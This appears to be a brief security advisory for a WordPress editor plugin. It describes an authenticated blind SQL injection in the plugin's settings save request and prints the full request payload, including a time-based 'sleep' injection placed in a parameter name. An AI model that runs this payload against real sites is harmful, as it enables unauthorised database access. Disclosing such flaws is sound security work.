The plugin did not sanitise or validate its setting fields leading to an authenticated (admin+) blind SQL injection issue via an arbitrary parameter when making a request to save the settings.
https://drive.google.com/file/d/1KT4lHePmYuX3_6jvA4AEQ1MVDwJBlZOO/view?usp=sharing payload: wp_editor_ajax_nonce_settings_main=bfcfabefa8&action;=save_wpeditor_settings&submit;=Save%20Settings&cm0s;'//or//sleep(1)%23=cm0s